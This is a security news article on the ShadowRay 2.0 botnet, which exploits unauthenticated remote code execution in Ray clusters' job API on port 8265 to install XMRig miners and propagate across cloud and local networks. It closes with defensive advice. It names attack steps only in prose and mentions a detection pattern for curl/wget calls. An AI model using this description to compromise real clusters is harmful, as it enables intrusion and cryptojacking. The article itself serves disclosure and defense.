A sophisticated botnet campaign dubbed ShadowRay 2.0 is actively targeting exposed Ray Clusters across the globe, converting compromised infrastructure into cryptomining nodes. Capitalizing on a known code execution vulnerability, threat actors have weaponized this flaw to launch a wormable attack capable of self-replication and propagation between cloud and on-premises environments.
ShadowRay 2.0 Leverages Known Vulnerability for Widespread Exploitation
The new campaign marks an escalation in abuse of the Ray distributed computing framework, an open-source platform widely deployed by developers for training large-scale AI models and machine learning workloads.
Vulnerability Allows Unauthenticated Remote Code Execution
The attackers exploit a known security flaw introduced in Ray version 1.0.0 and patched quietly in version 2.4.0. This vulnerability allows unauthenticated remote code execution (RCE) on Ray Clusters that have been deployed without protective network segmentation or authentication. The flaw existed for nearly three years, leaving thousands of deployments potentially vulnerable in that window. According to security researchers, the root cause lies in the unrestricted nature of Ray’s job submission API over port 8265, which accepts arbitrary Python code without verification under certain configurations.
Thousands of Publicly Exposed Ray Nodes Identified
Security scans have revealed that over 5,000 Ray nodes remain publicly accessible on the internet, many of which are deployed on cloud infrastructure. These internet-exposed clusters present ideal entry points for an attacker looking to expand their cryptomining capabilities. Once a node is compromised, ShadowRay 2.0 scripts identify additional vulnerable clusters and spread laterally using the same exploit, creating a self-propagating botnet.
Novel Features in ShadowRay 2.0 Enhance Persistence and Propagation
Researchers investigating ShadowRay 2.0 note significant advancements compared to its predecessor campaign, ShadowRay, which first emerged in late 2023. The upgraded variant employs stealthier mechanisms for payload delivery, maintains control via persistent backdoors, and includes automated propagation logic tailored to mixed environments.
Enhanced Cryptomining Operations With Obfuscation and Resilience
The cryptomining payload, delivered post-infection, installs XMRig—an open-source Monero mining application—configured to run under obfuscated process names. Scheduled tasks and cron jobs enable persistence across host reboots, while basic evasion tactics help avoid some monitoring tools. Additionally, the botnet communicates with anonymized command-and-control (C2) infrastructure, complicating attribution and takedown efforts.
Propagation Logic Bridges Cloud and Local Systems
Notably, ShadowRay 2.0 is designed to thrive in hybrid environments. The malware’s propagation logic detects new potential targets within private networks, such as adjacent cloud VMs or local data center nodes. If remote Ray Clusters lack authentication or firewall protection, they too become part of the botnet through automated script execution. This behavior introduces significant risk for organizations using Ray for large-scale AI processing but neglecting internal segmentation and hardening protocols.
Recommendations to Secure Ray Cluster Deployments
Given the active threat posed by ShadowRay 2.0, organizations should review their distributed application and container security practices, particularly those relying on Ray.
Immediate Action Items for Defenders
Security teams should consider the following steps to protect against current and future variants of the ShadowRay campaign:
- Upgrade Ray to version 2.4.0 or higher, where the RCE flaw was patched.
- Remove public exposure of Ray Dashboard and head node APIs, particularly over port 8265.
- Enforce authentication and role-based access control (RBAC) for job submissions.
- Implement firewall rules and VPC (Virtual Private Cloud) segmentation to block unauthorized inbound connections.
- Monitor for unusual traffic patterns that could indicate botnet communication or lateral scanning.
Proactive detection can also benefit from intrusion detection systems (IDS) that recognize signs of XMRig execution, unexpected Python interpreter behavior, or suspicious curl/wget calls in Ray environment logs.
A Cautionary Tale for AI Infrastructure Operators
The ShadowRay 2.0 campaign underscores the critical importance of securing distributed AI infrastructure, especially open-source platforms that simplify job execution and orchestration. As organizations accelerate machine learning workloads in production, they must also modernize their operational defenses.
Leaving Ray Clusters exposed or misconfigured can open the door to threats not just from botnets, but from advanced persistent threats (APTs) seeking access to high-performance compute resources. While ShadowRay 2.0 primarily monetizes victims through cryptojacking, its propagation mechanics could be repurposed for espionage or destructive purposes.
With the rapid growth of AI-native deployments, defenders face increasing pressure to secure frameworks like Ray at both the software and network layers. The ongoing evolution of ShadowRay hints that threat actors have recognized—and intend to exploit—that pressure.
